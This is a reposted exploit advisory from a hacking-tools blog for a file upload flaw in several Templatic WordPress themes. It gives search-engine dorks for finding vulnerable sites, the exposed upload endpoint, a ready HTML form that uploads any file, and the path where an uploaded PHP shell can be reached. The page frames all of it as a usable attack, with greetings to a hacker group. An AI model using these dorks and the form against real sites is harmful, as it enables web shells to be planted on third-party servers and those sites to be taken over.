Wordpress Templatic Themes CSRF File Upload Vulnerability

#Title : Wordpress Templatic Themes CSRF File Upload Vulnerability [Monetize Uploader]
#Author : Jje Incovers
#Date : 31/03/2014
#Category : Web Applications
#Type : PHP
#Vendor : http://templatic.com/
#Download : http://templatic.com/wordpress-themes-store/
#Tested : Mozila, Chrome, Opera -> Windows & Linux
#Vulnerabillity : CSRF
 
#Dork :
inurl:/wp-content/themes/Realestate/
inurl:/wp-content/themes/dailydeal/
inurl:/wp-content/themes/nightlife/
inurl:/wp-content/themes/5star/
inurl:/wp-content/themes/specialist/
 
CSRF File Upload Vulnerability
 
Exploit & POC : http://site-target/wp-content/themes/Realestate/Monetize/general/upload-file.php
 
<html>
<body>
<center>
<form method="post" enctype="multipart/form-data" action="http://site-target/wp-content/themes/Realestate/Monetize/general/upload-file.php
">
 
<br>
</br>
<input name="uploadfile[]" type="file" />
 
<br>
<input type="submit" value="upload" />
</form>
</center>
</body>
</html>
 
File Access :
http://site-target/wp-content/themes/Realestate/images/tmp/your_shell.php
 
Note :
Script CSRF equate with dork you use
 
########################################
#Greetz : SANJUNGAN JIWA , All Indonesian H4xor
#Thanks : All member SANJUNGAN JIWA , Co-p1r3 , Jje Incovers , MrTieDie , Ice-Cream ,
########################################
 
# 90952935D5011A31   1337day.com [2014-04-03]   69BF4D7EF87E2E8E #

http://1337day.com/exploit/22091
Labels:

About ""

Lorem ipsum dolor sit amet, consectetur adipiscing elit. Vivamus suscipit, augue quis mattis gravida, est dolor elementum felis, sed vehicula metus quam a mi. Praesent dolor felis, consectetur nec convallis vitae.

0 comments:

Never Forget To Say Thanks :D

Subscribe to: Post Comments (Atom)
Copyright © 2013 Hacking Tools and Tech eBooks Collection and Blogger Templates - Anime OST.